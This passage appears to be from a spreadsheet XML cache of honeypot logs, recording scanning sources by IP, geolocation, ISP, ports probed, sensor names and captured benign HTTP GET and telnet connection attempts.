    <s v="23&amp;&amp;37023&amp;&amp;56053&amp;&amp;56081&amp;&amp;56065&amp;&amp;64695&amp;&amp;48412&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc84:7fb0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3421"/>
    <x v="3421"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:11:47"/>
    <d v="2025-04-03T05:11:47"/>
    <d v="2025-04-03T05:11:47"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:dd4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3422"/>
    <x v="3422"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:10:49"/>
    <d v="2025-04-03T05:10:49"/>
    <d v="2025-04-03T05:10:49"/>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c:9516"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3423"/>
    <x v="3423"/>
    <s v="NA&amp;&amp;ool-ad02877e.dyn.optonline.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:02:21"/>
    <d v="2024-12-06T15:18:56"/>
    <d v="2025-04-03T05:02:21"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NJ"/>
    <s v="New Jersey"/>
    <s v="Hudson"/>
    <s v="North Bergen"/>
    <s v="5101879"/>
    <s v="07047"/>
    <s v="40.8043"/>
    <s v="-74.0121"/>
    <s v="6128"/>
    <s v="Cablevision Systems Corp."/>
    <s v="Cablevision Systems Corp."/>
    <s v="residential"/>
    <s v="Optimum Online (Cablevision Systems)"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-10-07 04:00:00"/>
    <s v="2025-10-06 04:00:00"/>
    <s v="2024-10-06 14:30:18"/>
    <s v="['AUTHNS1.CV.NET', 'AUTHNS1.CVNET.COM']"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientRenewProhibited https://icann.org/epp#clientRenewProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']"/>
    <s v="Registration Private"/>
    <x v="20"/>
    <s v="NA"/>
    <s v="['DomainsByProxy.com', '100 S. Mill Ave, Suite 1600']"/>
    <s v="::ffff:ad02:877e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3424"/>
    <x v="3424"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T04:55:32"/>
    <d v="2025-04-03T04:53:42"/>
    <d v="2025-04-03T04:55:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:658f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3425"/>
    <x v="3425"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T04:50:46"/>
    <d v="2025-04-03T04:44:32"/>
    <d v="2025-04-03T04:50:46"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:1f4f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3426"/>
    <x v="3426"/>
    <s v="125-229-224-226.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T04:44:37"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T04:44:37"/>
    <n v="585"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;53&amp;&amp;62756&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de5:e0e2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3427"/>
    <x v="3427"/>
    <s v="59-126-136-131.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T04:34:43"/>
    <d v="2024-02-06T06:38:00"/>
    <d v="2025-04-03T04:34:43"/>
    <n v="1023"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_PJL_H42&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;445&amp;&amp;5900&amp;&amp;443&amp;&amp;9100&amp;&amp;389&amp;&amp;22&amp;&amp;4798&amp;&amp;6730&amp;&amp;40936&amp;&amp;63468&amp;&amp;40952&amp;&amp;38537"/>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None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:8883"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3428"/>
    <x v="3428"/>
    <s v="114-33-254-88.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T04:17:46"/>
    <d v="2024-09-02T10:06:00"/>
    <d v="2025-04-03T04:17:46"/>
    <n v="542"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;11965"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7221:fe58"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3429"/>
    <x v="3429"/>
    <s v="36-235-117-177.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T04:10:01"/>
    <d v="2025-04-03T04:10:01"/>
    <d v="2025-04-03T04:10:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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24eb:75b1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3430"/>
    <x v="3430"/>
    <s v="NA&amp;&amp;114-35-102-128.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T03:45:29"/>
    <d v="2024-09-05T02:31:00"/>
    <d v="2025-04-03T03:45:29"/>
    <n v="228"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;21&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:6680"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3431"/>
    <x v="3431"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T03:35:12"/>
    <d v="2024-11-27T02:48:57"/>
    <d v="2025-04-03T03:35:12"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H24"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal"/>
    <s v="1275841"/>
    <s v="462001"/>
    <s v="23.259900000000002"/>
    <s v="77.4126"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="1 Malviya Nagar"/>
    <s v="2006-12-19"/>
    <s v="ABTS-DSL-MPCG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.168.126.219,59226)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa8:7edb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3432"/>
    <x v="3432"/>
    <s v="114-35-42-193.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T03:28:37"/>
    <d v="2024-01-27T15:57:24"/>
    <d v="2025-04-03T03:28:37"/>
    <n v="461"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;25577&amp;&amp;23&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:2ac1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3433"/>
    <x v="3433"/>
    <s v="NA&amp;&amp;node-xkn.pool-101-109.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-03T03:24:30"/>
    <d v="2025-03-30T14:25:14"/>
    <d v="2025-04-03T03:24:30"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="cellular"/>
